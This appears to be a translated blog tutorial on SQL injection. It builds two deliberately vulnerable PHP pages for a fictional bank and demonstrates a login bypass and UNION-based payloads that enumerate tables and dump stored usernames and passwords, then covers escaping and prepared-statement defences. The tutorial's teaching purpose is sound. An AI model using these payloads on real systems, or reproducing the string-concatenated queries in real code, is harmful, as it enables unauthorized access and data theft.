Article Source: https://tienminhvy.com/kinh-nghiem/sql-injection-la-gi-va-cach-phong-tranh
SQL injection is a fairly basic but extremely dangerous mistake in web application programming; nevertheless, many large websites on the Internet have suffered from this serious security flaw and, as a result, leaked the data of millions of users around the world.
Programming a website is inherently difficult, and protecting it from hackers who stalk your site is even harder. In the previous post I mentioned the data leaks at Flaticon and Freepik, and the cause of that incident was an SQL injection flaw.
Why is this flaw so basic, yet so many programmers still make it when writing applications? Let's find out.
What is SQL injection?
SQL injection is a technical flaw that a programmer accidentally (or perhaps intentionally) creates when writing a web application: the application fails to check whether user input contains special characters that affect the database system.
This allows hackers to pass the data check with just a few special characters, and the result, as you know, is a security incident that leads to unwanted leakage of user data. SQL injection usually occurs in login and registration forms, search forms, data lookup forms, and so on.
How dangerous is SQL injection?
SQL injection is extremely dangerous: with an SQL injection flaw, hackers can steal data from a website's database. With this flaw, a hacker can insert data, dump data to the screen and steal it easily, and more.
In addition, if a hacker is an adversary of your website, that person can execute a command that deletes a lot of important data from the database, or even the entire database of a website, and the database is the most important thing for a dynamic website.
An example of a SQL injection error
Example #1
So that you can picture what an SQL injection flaw looks like and how dangerous it is, I have written a small login form for testing as follows (note that this form is for testing purposes only):
PHP:
```php
<?php
// SQL injection example
// Copyright © 2020 by tienminhvy.com - please credit the source if you share this
$db = mysqli_connect('localhost', 'root', '', 'sql_inj', '3306');
if (!$db) {
    die('Không thể kết nối đến CSDL, hãy kiểm tra lại thông tin');
}
$content = <<<HTML
<form method='POST'>
<p>Bạn phải đăng nhập mới có thể tiếp tục sử dụng dịch vụ!</p>
<input type="text" name="username" placeholder='Tên đăng nhập' required>
<input type="password" name="password" placeholder='Mật khẩu' required>
<button type='submit'>Đăng nhập</button>
</form>
HTML;
if (isset($_POST['username'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];
    // The user input is concatenated straight into the SQL text: this is the injection point
    $result = mysqli_query($db, "SELECT * FROM user WHERE username = '$username' AND password = '$password'");
    if (mysqli_num_rows($result) == 1) {
        $content = "<p>Đăng nhập thành công</p>";
        $content .= "<p><b>Thông tin tài khoản</b></p>";
        $content .= "<p><b>Tên đăng nhập:</b> $username</p>";
        $content .= "<p><b>Số dư tài khoản:</b> 29,194,500đ</p>";
    } else {
        $content .= "<p><b>Đăng nhập thất bại</b></p>";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Ngân hàng XYZ</title>
</head>
<body>
<?php echo $content; ?>
</body>
</html>
```
Start testing
For example, this is the login page of XYZ bank. I know the username of a person named tmv, but he did not give me the password, so when I enter any password, the web server returns the result shown below.
And since I'm always mischievous, I added the character (') to the password box and got the following result:
When the server returns an error of the form Warning: …, this website surely has an SQL injection vulnerability. Therefore, if I want to log in, I enter the username, type the following in the password box, and click login:
```sql
' OR 1 = 1 --
```
And the website will return the following page:
Why is that?
Here, I guess that the SQL statement behind this website works roughly as follows:
```sql
SELECT * FROM table WHERE username = 'tmv' AND password = 'matkhau'
```
And when I enter the character (') after an arbitrary password in the password box, the statement becomes:
```sql
SELECT * FROM table WHERE username = 'tmv' AND password = 'matkhau' '
```
When this statement is executed, the system raises the Warning: … error shown above, so I modify my input and the resulting statement is:
```sql
SELECT * FROM table WHERE username = 'tmv' AND password = '' OR 1 = 1 -- '
```
Here, when the system evaluates this statement, there are three conditions: username = string, password = string, and 1 = 1. Normally, when condition 1 is true but condition 2 is false, the system stops right there. After the transformation above, the statement returns TRUE in every case, because TRUE AND FALSE OR TRUE evaluates to TRUE.
Therefore, the system finds the user and obviously bypasses the password check, so it returns that user's information as shown above without going through any check at all.
Example #2
In this example, I will obtain the information of all users in the database of the XYZ Bank website. The source code of this page is as follows (for testing purposes only):
```php
<?php
// SQL injection example
// Copyright © 2020 by tienminhvy.com - please credit the source if you share this
$db = mysqli_connect('localhost', 'root', '', 'sql_inj', '3306');
if (!$db) {
    die('Không thể kết nối đến CSDL, hãy kiểm tra lại thông tin');
}
$content = <<<HTML
<form method='POST'>
<p>Tìm tin nhắn. Hãy nhập tiêu đề</p>
<input type="text" name="tieude" placeholder='Tiêu đề cần tìm' required>
<button type='submit'>Kiểm tra</button>
</form>
HTML;
if (isset($_POST['tieude'])) {
    $tieude = $_POST['tieude'];
    // The search title is concatenated straight into the SQL text: this is the injection point
    $result = mysqli_query($db, "SELECT msg, msg_name FROM msg WHERE msg_name = '$tieude'");
    if (mysqli_num_rows($result) > 0) {
        $content .= "<table> <tr> <th>Tiêu đề tin nhắn</th> <th>Nội dung</th> </tr>";
        while ($row = mysqli_fetch_assoc($result)) {
            $content .= "<tr> <td>" . $row['msg_name'] . "</td> <td>" . $row['msg'] . "</td> </tr>";
        }
        $content .= "</table>";
    } else {
        $content .= "<p><b>Không tìm thấy</b></p>";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Tin nhắn - Ngân hàng XYZ</title>
</head>
<body>
<?php echo $content; ?>
</body>
</html>
```
For example, bank XYZ has a page for looking up bank messages; if I want to check the bank's messages, I go to the page above. I do the same thing as before: enter the character (') in the title box and click Check.
And the website shows the message below, so it has an SQL injection flaw. This time there is more to it: if you enter a correct title, the website displays a list of titles and contents of the notices. So I guess that the system runs an SQL statement that fetches two columns, like this:
```sql
SELECT table_1, table_2 FROM table WHERE input = 'giatri'
```
Therefore, I will enter the following statement in the box:
```sql
-- Statement entered in the box:
' UNION ( SELECT table_name, table_schema FROM information_schema.tables ) --
-- Becomes
SELECT table_1, table_2 FROM table WHERE input='' UNION ( SELECT table_name, table_schema FROM information_schema.tables ) -- '
```
After entering it, I press Check to execute the statement.
And we receive the following list; with the statement above we now know how many tables exist in the databases on that SQL server. To check the database the website is currently connected to, scroll down to the bottom of the list.
And below, right after the last phpmyadmin entry, two rows begin on a new line; those two rows are the two tables currently in the database named sql_inj.
The user table will contain the login information of all users on this website. But I still do not know how many columns the user table has, because if I take all of them with an asterisk (*), the system will error.
So, I’ll type the following in the box and press Enter:
```sql
-- Statement entered in the box:
' UNION ( SELECT column_name, 1 FROM information_schema.columns WHERE table_name='user' ) --
-- Becomes
SELECT table_1, table_2 FROM table WHERE input='' UNION ( SELECT column_name, 1 FROM information_schema.columns WHERE table_name='user' ) -- '
```
In the statement above I chose two columns, column_name and 1, because the system selects two columns to process the request by default, so choosing more or fewer will cause an error.
After executing the statement above, I get the list shown below. As you can see, there are countless columns in the user tables across the whole database server; here I predict that the two bolded lines are the columns of the user table in the sql_inj database.
And to get the information in this user table, I enter the following statement in the box and press Enter:
```sql
-- Statement entered in the box:
' UNION ( SELECT username, password FROM user ) --
-- Becomes
SELECT table_1, table_2 FROM table WHERE input='' UNION ( SELECT username, password FROM user ) -- '
```
And we have successfully retrieved the list of users in the user table.
How to prevent SQL injection vulnerability
As you can see above, the SQL injection vulnerability is extremely dangerous because it lets hackers manipulate the database directly without passing any verification step.
Fortunately, most current programming languages already provide functions to escape the statement (adding a backslash (\) before special characters) before executing it on the database, which limits and, most likely, safely blocks SQL injection vulnerabilities.
The PHP language provides many functions for this, most notably mysqli_real_escape_string(); with this function, the system uses the escaping syntax of the database system to turn the input string into a standard SQL string.
To use this function, refer to the code below:
```php
<?php
$db = mysqli_connect('localhost', 'root', '', 'sql_inj', '3306');
if (!$db) {
    die('Không thể kết nối đến CSDL, hãy kiểm tra lại thông tin');
}
$chuoiCanEscape = "test'";
// Escape the quote using the rules of the connected database server
$chuoiDaEscape = mysqli_real_escape_string($db, $chuoiCanEscape);
$caulenh = "SELECT * FROM table WHERE username='$chuoiDaEscape'";
// The statement becomes: SELECT * FROM table WHERE username='test\''
?>
```
As you can see, the input has been escaped and the statement is safe to execute.
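Escaping with mysqli_real_escape_string() only protects values placed inside quoted string literals, and the Warning: … messages used above still act as an oracle. As an added example that is not the article's code, here are both forms from Examples #1 and #2 rewritten with prepared statements, hashed passwords and generic error handling; the table and column names follow the article, while the password_hash() storage and the helper function names are assumptions.

```php
<?php
// Added example (not the article's own code): the login form and the message
// search from Examples #1 and #2, rewritten with prepared statements.
// Assumes the same database 'sql_inj' with tables `user` (username, password)
// and `msg` (msg_name, msg); the password column is assumed to hold
// password_hash() output rather than plaintext.

// Turn mysqli errors into exceptions so a failed query never prints a
// "Warning: ..." with query details to the visitor.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function connect(): mysqli
{
    return mysqli_connect('localhost', 'root', '', 'sql_inj', 3306);
}

// Example #1, hardened: the user-supplied values never become part of the
// SQL text; they are bound as parameters, so an input such as ' OR 1 = 1 --
// is compared literally against the username column and matches nothing.
function login(mysqli $db, string $username, string $password): bool
{
    $stmt = mysqli_prepare($db, 'SELECT password FROM user WHERE username = ?');
    mysqli_stmt_bind_param($stmt, 's', $username);
    mysqli_stmt_execute($stmt);
    $row = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));
    mysqli_stmt_close($stmt);
    if ($row === null) {
        return false; // unknown user
    }
    // Compare against a stored hash instead of a plaintext password column.
    return password_verify($password, $row['password']);
}

// Example #2, hardened: the title is bound as a parameter, so a UNION payload
// is just a title that does not exist and the column count no longer matters.
function findMessages(mysqli $db, string $title): array
{
    $stmt = mysqli_prepare($db, 'SELECT msg_name, msg FROM msg WHERE msg_name = ?');
    mysqli_stmt_bind_param($stmt, 's', $title);
    mysqli_stmt_execute($stmt);
    $rows = mysqli_fetch_all(mysqli_stmt_get_result($stmt), MYSQLI_ASSOC);
    mysqli_stmt_close($stmt);
    return $rows;
}

// Render rows with htmlspecialchars(): the original concatenated $row['msg']
// straight into the HTML, so a stored message could also inject markup.
function renderMessages(array $rows): string
{
    if ($rows === []) {
        return '<p><b>Không tìm thấy</b></p>';
    }
    $html = '<table><tr><th>Tiêu đề tin nhắn</th><th>Nội dung</th></tr>';
    foreach ($rows as $row) {
        $html .= '<tr><td>' . htmlspecialchars($row['msg_name'], ENT_QUOTES, 'UTF-8')
               . '</td><td>' . htmlspecialchars($row['msg'], ENT_QUOTES, 'UTF-8')
               . '</td></tr>';
    }
    return $html . '</table>';
}

try {
    $db = connect();
    if (isset($_POST['username'], $_POST['password'])) {
        echo login($db, $_POST['username'], $_POST['password'])
            ? '<p>Đăng nhập thành công</p>'
            : '<p><b>Đăng nhập thất bại</b></p>';
    }
    if (isset($_POST['tieude'])) {
        echo renderMessages(findMessages($db, $_POST['tieude']));
    }
} catch (mysqli_sql_exception $e) {
    // Log the real error server-side; show the visitor only a generic message.
    error_log('Database error: ' . $e->getMessage());
    echo '<p>An error occurred, please try again later.</p>';
}
```

With the parameters bound, the ' and UNION inputs from the walkthrough above produce an ordinary "not found" result instead of a Warning or a data dump.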
Summary
In summary, through this article you have learned what SQL injection is, how dangerous it is, and how to prevent it. Please apply the solution above to all forms when you program your website, and remember the unwritten rule: "Never trust user input!".
Good luck.